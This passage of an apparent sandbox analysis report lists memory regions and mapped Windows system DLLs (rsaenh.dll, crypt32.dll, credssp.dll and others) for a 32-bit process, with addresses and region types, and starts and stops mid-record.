"\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2195 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 2196 start_va = 0x731a0000 end_va = 0x731a7fff entry_point = 0x731a0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 2232 start_va = 0x731f0000 end_va = 0x7326ffff entry_point = 0x732037c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2233 start_va = 0x1bc0000 end_va = 0x1c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001bc0000" filename = "" Region: id = 2234 start_va = 0x1d10000 end_va = 0x1deefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d10000" filename = "" Region: id = 2236 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 2237 start_va = 0x2410000 end_va = 0x24d7fff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 2241 start_va = 0x24e0000 end_va = 0x27aefff entry_point = 0x24e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2243 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 2244 start_va = 0x73270000 end_va = 0x7340dfff entry_point = 0x73270000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 2245 start_va = 0x360000 end_va = 0x360fff entry_point = 0x360000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2249 start_va = 0x600000 end_va = 0x601fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 2262 start_va = 0x360000 end_va = 0x360fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 2263 start_va = 0x75a90000 end_va = 0x75b12fff entry_point = 0x75a923d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2264 start_va = 0x610000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2269 start_va = 0x1bc0000 end_va = 0x1bfffff entry_point = 0x0 region_type = private name = "private_0x0000000001bc0000" filename = "" Region: id = 2270 start_va = 0x1c20000 end_va = 0x1c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c20000" filename = "" Region: id = 2271 start_va = 0x27b0000 end_va = 0x28affff entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 2272 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 2273 start_va = 0x1c60000 end_va = 0x1c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 2274 start_va = 0x28b0000 end_va = 0x29affff entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 2275 start_va = 0x749c0000 end_va = 0x749d5fff entry_point = 0x749c2dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2276 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 2277 start_va = 0x1ca0000 end_va = 0x1cdbfff entry_point = 0x1ca0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2278 start_va = 0x1ca0000 end_va = 0x1cdbfff entry_point = 0x1ca128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2279 start_va = 0x1ca0000 end_va = 0x1cdbfff entry_point = 0x1ca128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2280 start_va = 0x1ca0000 end_va = 0x1cdbfff entry_point = 0x1ca128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2281 start_va = 0x1ca0000 end_va = 0x1cdbfff entry_point = 0x1ca128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2282 start_va = 0x74980000 end_va = 0x749bafff entry_point = 0x7498128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2283 start_va = 0x74970000 end_va = 0x7497dfff entry_point = 0x74970000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 2325 start_va = 0x1ca0000 end_va = 0x1cdffff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 2326 start_va = 0x1df0000 end_va = 0x1e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001df0000" filename = "" Region: id = 2327 start_va = 0x29b0000 end_va = 0x2aaffff entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 2328 start_va = 0x2ab0000 end_va = 0x2baffff entry_point = 0x0 region_type = private name = "private_0x0000000002ab0000" filename = "" Region: id = 2329 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 2330 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 2332 start_va = 0x2340000 end_va = 0x23fffff entry_point = 0x2340000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2339 start_va = 0x1c00000 end_va = 0x1c00fff entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 2340 start_va = 0x1e30000 end_va = 0x1e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 2341 start_va = 0x1e80000 end_va = 0x1ebffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 2342 start_va = 0x2bb0000 end_va = 0x2caffff entry_point = 0x0 region_type = private name = "private_0x0000000002bb0000" filename = "" Region: id = 2343 start_va = 0x2cb0000 end_va = 0x2daffff entry_point = 0x0 region_type = private name = "private_0x0000000002cb0000" filename = "" Region: id = 2344 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 2345 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 2358 start_va = 0x1c10000 end_va = 0x1c10fff entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 2359 start_va = 0x1ce0000 end_va = 0x1ce0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 2360 start_va = 0x1cf0000 end_va = 0x1cf0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cf0000" filename = "" Region: id = 2361 start_va = 0x1ec0000 end_va = 0x1ec0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 2366 start_va = 0x1ed0000 end_va = 0x1ed0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 2367 start_va = 0x1ee0000 end_va = 0x1ee0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ee0000" filename = "" Region: id = 2368 start_va = 0x1ef0000 end_va = 0x1ef0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 2369 start_va = 0x2400000 end_va = 0x2400fff entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 2370 start_va = 0x2db0000 end_va = 0x2eaffff entry_point = 0x0 region_type = private name = "private_0x0000000002db0000" filename = "" Region: id = 2371 start_va = 0x2eb0000 end_va = 0x2eeffff entry_point = 0x0 region_type = private name = "private_0x0000000002eb0000" filename = "" Region: id = 2372 start_va = 0x2ef0000 end_va = 0x2feffff entry_point = 0x0 region_type = private name = "private_0x0000000002ef0000" filename = "" Region: id = 2373 start_va = 0x2ff0000 end_va = 0x2ff0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ff0000" filename = "" Region: id = 2374 start_va = 0x3000000 end_va = 0x3000fff entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 2375 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2376 start_va = 0x3020000 end_va = 0x3020fff entry_point = 0x0 region_type = private name = "private_0x0000000003020000" filename = "" Region: id = 2377 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2378 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 2379 start_va = 0x3050000 end_va = 0x3050fff entry_point = 0x0 region_type = private name = "private_0x0000000003050000" filename = "" Region: id = 2380 start_va = 0x3060000 end_va = 0x3060fff entry_point = 0x0 region_type = private name = "private_0x0000000003060000" filename = "" Region: id = 2381 start_va = 0x3070000 end_va = 0x3070fff entry_point = 0x0 region_type = private name = "private_0x0000000003070000" filename = "" Region: id = 2382 start_va = 0x3080000 end_va = 0x3080fff entry_point = 0x0 region_type = private name = "private_0x0000000003080000" filename = "" Region: id = 2383 start_va = 0x3090000 end_va = 0x3090fff entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 2384 start_va = 0x30a0000 end_va = 0x30a0fff entry_point = 0x0 region_type = private name = "private_0x00000000030a0000" filename = "" Region: id = 2385 start_va = 0x30b0000 end_va = 0x30b0fff entry_point = 0x0 region_type = private name = "private_0x00000000030b0000" filename = "" Region: id = 2386 start_va = 0x30c0000 end_va = 0x30c0fff entry_point = 0x0 region_type = private name = "private_0x00000000030c0000" filename = "" Region: id = 2387 start_va = 0x30d0000 end_va = 0x30d0fff entry_point = 0x0 region_type = private name = "private_0x00000000030d0000" filename = "" Region: id = 2388 start_va = 0x30e0000 end_va = 0x30e0fff entry_point = 0x0 region_type = private name = "private_0x00000000030e0000" filename = "" Region: id = 2389 start_va = 0x30f0000 end_va = 0x30f0fff entry_point = 0x0 region_type = private name = "private_0x00000000030f0000" filename = "" Region: id = 2390 start_va = 0x3100000 end_va = 0x3100fff entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 2391 start_va = 0x3110000 end_va = 0x3110fff entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 2392 start_va = 0x3120000 end_va = 0x3120fff entry_point = 0x0 region_type = private name = "private_0x0000000003120000" filename = "" Region: id = 2393 start_va = 0x3130000 end_va = 0x3130fff entry_point = 0x0 region_type = private name = "private_0x0000000003130000" filename = "" Region: id = 2394 start_va = 0x3140000 end_va = 0x3140fff entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 2395 start_va = 0x3150000 end_va = 0x3150fff entry_point = 0x0 region_type = private name = "private_0x0000000003150000" filename = "" Region: id = 2396 start_va = 0x3160000 end_va = 0x3160fff entry_point = 0x0 region_type = private name = "private_0x0000000003160000" filename = "" Region: id = 2397 start_va = 0x3170000 end_va = 0x3170fff entry_point = 0x0 region_type = private name = "private_0x0000000003170000" filename = "" Region: id = 2398 start_va = 0x3180000 end_va = 0x3180fff entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 2399 start_va = 0x3190000 end_va = 0x3190fff entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 2400 start_va = 0x31a0000 end_va = 0x31a0fff entry_point = 0x0 region_type = private name = "private_0x00000000031a0000" filename = "" Region: id = 2401 start_va = 0x31b0000 end_va = 0x31b0fff entry_point = 0x0 region_type = private name = "private_0x00000000031b0000" filename = "" Region: id = 2402 start_va = 0x31c0000 end_va = 0x31c0fff entry_point = 0x0 region_type = private name = "private_0x00000000031c0000" filename = "" Region: id = 2403 start_va = 0x31d0000 end_va = 0x31d0fff entry_point = 0x0 region_type = private name = "private_0x00000000031d0000" filename = "" Region: id = 2404 start_va = 0x31e0000 end_va = 0x31e0fff entry_point = 0x0 region_type = private name = "private_0x00000000031e0000" filename = "" Region: id = 2405 start_va = 0x31f0000 end_va = 0x31f0fff entry_point = 0x0 region_type = private name = "private_0x00000000031f0000" filename = "" Region: id = 2406 start_va = 0x3200000 end_va = 0x3200fff entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 2407 start_va = 0x3210000 end_va = 0x3210fff entry_point = 0x0 region_type = private name = "private_0x0000000003210000" filename = "" Region: id = 2408 start_va = 0x3220000 end_va = 0x3220fff entry_point = 0x0 region_type = private name = "private_0x0000000003220000" filename = "" Region: id = 2409 start_va = 0x3230000 end_va = 0x3230fff entry_point = 0x0 region_type = private name = "private_0x0000000003230000" filename = "" Region: id = 2410 start_va = 0x3240000 end_va = 0x3240fff entry_point = 0x0 region_type = private name = "private_0x0000000003240000" filename = "" Region: id = 2411 start_va = 0x3250000 end_va = 0x3250fff entry_point = 0x0 region_type = private name = "private_0x0000000003250000" filename = "" Region: id = 2412 start_va = 0x3260000 end_va = 0x3260fff entry_point = 0x0 region_type = private name = "private_0x0000000003260000" filename = "" Region: id = 2413 start_va = 0x3270000 end_va = 0x3270fff entry_point = 0x0 region_type = private name = "private_0x0000000003270000" filename = "" Region: id = 2414 start_va = 0x3280000 end_va = 0x3280fff entry_point = 0x0 region_type = private name = "private_0x0000000003280000" filename = "" Region: id = 2415 start_va = 0x3290000 end_va = 0x3290fff entry_point = 0x0 region_type = private name = "private_0x0000000003290000" filename = "" Region: id = 2416 start_va = 0x32a0000 end_va = 0x32a0fff entry_point = 0x0 region_type = private name = "private_0x00000000032a0000" filename = "" Region: id = 2417 start_va = 0x32b0000 end_va = 0x32b0fff entry_point = 0x0 region_type = private name = "private_0x00000000032b0000" filename = "" Region: id = 2418 start_va = 0x32c0000 end_va = 0x32c0fff entry_point = 0x0 region_type = private name = "private_0x00000000032c0000" filename = "" Region: id = 2419 start_va = 0x32d0000 end_va = 0x32d0fff entry_point = 0x0 region_type = private name = "private_0x00000000032d0000" filename = "" Region: id = 2420 start_va = 0x32e0000 end_va = 0x32e0fff entry_point = 0x0 region_type = private name = "private_0x00000000032e0000" filename = "" Region: id = 2421 start_va = 0x32f0000 end_va = 0x32f0fff entry_point = 0x0 region_type = private name = "private_0x00000000032f0000" filename = "" Region: id = 2422 start_va = 0x3300000 end_va = 0x3300fff entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 2423 start_va = 0x3310000 end_va = 0x3310fff entry_point = 0x0 region_type = private name = "private_0x0000000003310000" filename = "" Region: id = 2424 start_va = 0x3320000 end_va = 0x3320fff entry_point = 0x0 region_type = private name = "private_0x0000000003320000" filename = "" Region: id = 2425 start_va = 0x3330000 end_va = 0x3330fff entry_point = 0x0 region_type = private name = "private_0x0000000003330000" filename = "" Region: id = 2426 start_va = 0x3340000 end_va = 0x3340fff entry_point = 0x0 region_type = private name = "private_0x0000000003340000" filename = "" Region: id = 2427 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 2494 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2496 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2497 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2505 start_va = 0x3360000 end_va = 0x339ffff entry_point = 0x0 region_type = private name = "private_0x0000000003360000" filename = "" Region: id = 2506 start_va = 0x33a0000 end_va = 0x349ffff entry_point = 0x0 region_type = private name = "private_0x00000000033a0000" filename = "" Region: id = 2507 start_va = 0x7ef9e000 end_va = 0x7efa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 2508 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2509 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2510 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2511 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2518 start_va = 0x34a0000 end_va = 0x34dffff entry_point = 0x0 region_type = private name = "private_0x00000000034a0000" filename = "" Region: id = 2519 start_va = 0x34e0000 end_va = 0x35dffff entry_point = 0x0 region_type = private name = "private_0x00000000034e0000" filename = "" Region: id = 2520 start_va = 0x7ef9b000 end_va = 0x7ef9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 2521 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2522 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2523 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2530 start_va = 0x35e0000 end_va = 0x361ffff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 2531 start_va = 0x3620000 end_va = 0x371ffff entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 2532 start_va = 0x7ef98000 end_va = 0x7ef9afff entry_point = 0x0 region_type = private name = "private_0x000000007ef98000" filename = "" Region: id = 2533 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2534 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2535 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2541 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2542 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2543 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2550 start_va = 0x3720000 end_va = 0x375ffff entry_point = 0x0 region_type = private name = "private_0x0000000003720000" filename = "" Region: id = 2551 start_va = 0x3760000 end_va = 0x385ffff entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 2552 start_va = 0x7ef95000 end_va = 0x7ef97fff entry_point = 0x0 region_type = private name = "private_0x000000007ef95000" filename = "" Region: id = 2553 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2554 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2555 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2556 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2572 start_va = 0x3860000 end_va = 0x389ffff entry_point = 0x0 region_type = private name = "private_0x0000000003860000" filename = "" Region: id = 2573 start_va = 0x38a0000 end_va = 0x399ffff entry_point = 0x0 region_type = private name = "private_0x00000000038a0000" filename = "" Region: id = 2574 start_va = 0x39a0000 end_va = 0x39dffff entry_point = 0x0 region_type = private name = "private_0x00000000039a0000" filename = "" Region: id = 2575 start_va = 0x39e0000 end_va = 0x3adffff entry_point = 0x0 region_type = private name = "private_0x00000000039e0000" filename = "" Region: id = 2576 start_va = 0x3ae0000 end_va = 0x3b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000003ae0000" filename = "" Region: id = 2577 start_va = 0x3b20000 end_va = 0x3c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b20000" filename = "" Region: id = 2578 start_va = 0x3c20000 end_va = 0x3d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000003c20000" filename = "" Region: id = 2579 start_va = 0x3d20000 end_va = 0x3d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000003d20000" filename = "" Region: id = 2580 start_va = 0x3d60000 end_va = 0x3e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000003d60000" filename = "" Region: id = 2581 start_va = 0x3e60000 end_va = 0x3e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 2582 start_va = 0x3ea0000 end_va = 0x3f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000003ea0000" filename = "" Region: id = 2583 start_va = 0x746f0000 end_va = 0x74740fff entry_point = 0x746f0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 2584 start_va = 0x7ef86000 end_va = 0x7ef88fff entry_point = 0x0 region_type = private name = "private_0x000000007ef86000" filename = "" Region: id = 2585 start_va = 0x7ef89000 end_va = 0x7ef8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 2586 start_va = 0x7ef8c000 end_va = 0x7ef8efff entry_point = 0x0 region_type = private name = "private_0x000000007ef8c000" filename = "" Region: id = 2587 start_va = 0x7ef8f000 end_va = 0x7ef91fff entry_point = 0x0 region_type = private name = "private_0x000000007ef8f000" filename = "" Region: id = 2588 start_va = 0x7ef92000 end_va = 0x7ef94fff entry_point = 0x0 region_type = private name = "private_0x000000007ef92000" filename = "" Region: id = 2589 start_va = 0x4100000 end_va = 0x410ffff entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 2590 start_va = 0x75ef0000 end_va = 0x7600cfff entry_point = 0x75ef0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 2591 start_va = 0x76010000 end_va = 0x7601bfff entry_point = 0x76010000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 2607 start_va = 0x3fa0000 end_va = 0x409ffff entry_point = 0x0 region_type = private name = "private_0x0000000003fa0000" filename = "" Region: id = 2608 start_va = 0x746d0000 end_va = 0x746e1fff entry_point = 0x746d1200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 2731 start_va = 0x746b0000 end_va = 0x746bafff entry_point = 0x746b0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 2738 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2739 start_va = 0x40a0000 end_va = 0x40dffff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 2740 start_va = 0x4110000 end_va = 0x420ffff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 2741 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 2742 start_va = 0x40e0000 end_va = 0x40e0fff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 2743 start_va = 0x74950000 end_va = 0x74966fff entry_point = 0x74950000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 2744 start_va = 0x4210000 end_va = 0x424ffff entry_point = 0x0 region_type = private name = "private_0x0000000004210000" filename = "" Region: id = 2745 start_va = 0x4250000 end_va = 0x434ffff entry_point = 0x0 region_type = private name = "private_0x0000000004250000" filename = "" Region: id = 2746 start_va = 0x7ef80000 end_va = 0x7ef82fff entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 2747 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2748 start_va = 0x40a0000 end_va = 0x40dffff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 2749 start_va = 0x4110000 end_va = 0x420ffff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 2750 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 2751 start_va = 0x40e0000 end_va = 0x40e0fff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 2752 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2753 start_va = 0x40e0000 end_va = 0x40e0fff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 2754 start_va = 0x4210000 end_va = 0x424ffff entry_point = 0x0 region_type = private name = "private_0x0000000004210000" filename = "" Region: id = 2755 start_va = 0x4250000 end_va = 0x434ffff entry_point = 0x0 region_type = private name = "private_0x0000000004250000" filename = "" Region: id = 2756 start_va = 0x7ef80000 end_va = 0x7ef82fff entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 2757 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2758 start_va = 0x40e0000 end_va = 0x40e0fff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 2759 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2760 start_va = 0x40e0000 end_va = 0x40e0fff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 2761 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2762 start_va = 0x4210000 end_va = 0x424ffff entry_point = 0x0 region_type = private name = "private_0x0000000004210000" filename = "" Region: id = 2763 start_va = 0x4250000 end_va = 0x434ffff entry_point = 0x0 region_type = private name = "private_0x0000000004250000" filename = "" Region: id = 2764 start_va = 0x7ef80000 end_va = 0x7ef82fff entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 2765 start_va = 0x40a0000 end_va = 0x40a0fff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 2766 start_va = 0x40b0000 end_va = 0x40effff entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 2767 start_va = 0x4110000 end_va = 0x420ffff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 2768 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 2769 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2770 start_va = 0x40a0000 end_va = 0x40a0fff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 2771 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2772 start_va = 0x40a0000 end_va = 0x40dffff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 2773 start_va = 0x40e0000 end_va = 0x40e0fff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 2774 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2775 start_va = 0x40e0000 end_va = 0x40e0fff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 2776 start_va = 